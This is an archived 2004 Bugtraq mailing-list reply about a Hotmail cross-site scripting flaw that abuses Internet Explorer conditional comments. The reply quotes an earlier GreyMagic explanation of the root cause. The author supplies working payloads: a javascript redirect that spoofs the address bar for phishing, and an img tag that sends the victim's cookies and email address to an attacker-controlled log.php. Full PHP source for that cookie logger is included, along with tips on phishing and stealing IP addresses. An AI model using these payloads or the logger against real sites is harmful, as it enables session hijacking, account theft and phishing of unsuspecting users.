lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY5-F17gAHQbCRLCUh00100a85@hotmail.com>
Date: Sat, 17 Jul 2004 18:15:25 +0100
From: "Andrew Hunter" <andiroohunter@....com>
To: bugtraq@...urityfocus.com
Subject: Re: Hotmail Cross Site Scripting Vulnerability


I've just been looking at this hotmail XSS attack, for people who couldn't 
get it to work you need to set the mime type to HTML.

I've looked at this issue with IE, and i've noticed another problem, if i 
send the line below to a hotmail address the url gets spoofed.

<!--[if IE gte 5]><img 
src="javascript:window.location='http://www.google.com'"><![endif]-->

That will auto redirect you to www.google.com but look at the address bar, 
for me it says:

http://by5fd.bay5.hotmail.msn.com/cgi-bin/compose?type=r&curmbox=foobar&a=foobar&msg=foobar&start=foobar&len=foobar&curmbox=F000000001&a=foobar

Ok so whats good about a spoofed URL?
Well it's from hotmail, this will make for an EXTREAMLY convincing phishing 
attack, since it's not hard to view the source of www.hotmail.com use the 
find command and search for form, and well everyone can figure out what to 
do from there.

Also it's possible to steal the users cookies using the following line:
<!--[if IE gte 5]><img 
src="javascript:window.location='http://www.yoursite.com/log.php?email=victimsaddress@hotmail.com&cookie=' 
+ document.cookie"><![endif]-->

Remember to type by hand the victims email address otherwise you won't know 
who's it is.

Content of log.php

<?php
$file="youpasswordlog.log";
if (isset($HTTP_GET_VARS["cookie"]) && isset($HTTP_GET_VARS["email"]){

    $logcookie = $HTTP_GET_VARS["cookie"];
    $logcookie = rawurldecode($logcookie); //turns url encoding to normal 
text
    $logemail = $HTTP_GET_VARS["email"];
    $logemail = rawurldecode($logemail); //turns url encoding to normal text

    $handle=fopen($file, "r+");         //Opening the file in read only
    $filecontence=fread($handle,filesize("$file"));
    fclose($handle);

    $handle=fopen($file, "w");   //Opening the file for writing
    fwrite($handle, "$logemail - $logcookie\n $filecontence\n ");
    //Writing email address and cookie then the rest of the log
    fclose($handle);
}
header("Location: http://www.hotmail.com");
?>

End of log.php

And of course you can add other stuff to log.php like an IP stealing 
function.

Also i think the possibilities are endless with this, since i think it's 
possible to use iframes and other javascript to split the document.location 
and get to the compose new message window and then load in addresses from 
the address book, but <script language="JavaScript"> Tags like this still 
appear to be filtered but i think a number of img tags with javascript in 
them will continue to be run, not sure yet.

Thanks
Andiroo



>From: "GreyMagic Security" <security@...ymagic.com>
>To: "Paul" <paul@...yhats.cjb.net>, <bugtraq@...urityfocus.com>
>Subject: Re: Hotmail Cross Site Scripting Vulnerability
>Date: Sat, 17 Jul 2004 18:33:10 +0200
>MIME-Version: 1.0
>Received: from outgoing2.securityfocus.com ([205.206.231.26]) by 
>mc8-f36.hotmail.com with Microsoft SMTPSVC(5.0.2195.6824); Sat, 17 Jul 2004 
>09:32:07 -0700
>Received: from lists2.securityfocus.com (lists2.securityfocus.com 
>[205.206.231.20])by outgoing2.securityfocus.com (Postfix) with QMQPid 
>A1440143700; Sat, 17 Jul 2004 09:53:46 -0600 (MDT)
>Received: (qmail 12291 invoked from network); 17 Jul 2004 09:27:59 -0000
>X-Message-Info: JGTYoYF78jE2OCEUGfFi8lsFJMf/QLtg
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>Message-ID: <004001c46c1b$bfbb0c80$060010b0@...on>
>References: <20040715231607.11682.qmail@....securityfocus.com>
>X-MSMail-Priority: Normal
>X-Mailer: Microsoft Outlook Express 6.00.2800.1409
>X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
>X-ESAFE-STATUS:Mail clean
>X-ESAFE-DETAILS: Clean
>X-Spam-Checker-Version: SpamAssassin 3.0.0-r20550 (2004-05-28) on 
>mail.securityfocus.com
>X-Spam-Status: No, score=0.0 required=5.0 tests=JAVASCRIPT_URI 
>autolearn=failed version=3.0.0-r20550
>X-Spam-Level: Return-Path: 
>bugtraq-return-15211-andiroohunter=msn.com@...urityfocus.com
>X-OriginalArrivalTime: 17 Jul 2004 16:32:07.0936 (UTC) 
>FILETIME=[9A26B000:01C46C1B]
>
> >Hotmail Cross Site Scripting Vulnerability
>
>--snip--
>
> >Well, Hotmail was just nice enough to be a little lenient on what
> >goes in-between those 'if' tags. I suppose that's so MS Word can
> >send stuff through email to Hotmail customers without it getting
> >messed up.
>
>The problem is not "if" tags, the problem is the syntax in which they are
>represented in the document (HTML Comments). Hotmail doesn't check anything
>between HTML comments because it assumes they won't be processed by the
>browser, not because it tries to leave backdoors for MSO docs. Hotmail's
>assumption that HTML comments are safe collides with the well-documented
>concept of "conditional comments" by the very same company.
>
>See
>http://msdn.microsoft.com/workshop/author/dhtml/overview/ccomment_ovw.asp
>for more information.
>
>Btw, this will work just fine without any need for MSO trickery:
>
><!--[if IE gte 5]> <img src="javascript:alert()"> <![endif]-->
>
>Simply checks if IE's major version is equal or greater than 5 and executes
>the content if true (older versions don't have the conditional comments
>feature, but they're irrelevant market-share wise anyway).
>
>Cheers.

_________________________________________________________________
It's fast, it's easy and it's free. Get MSN Messenger today! 
http://www.msn.co.uk/messenger



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ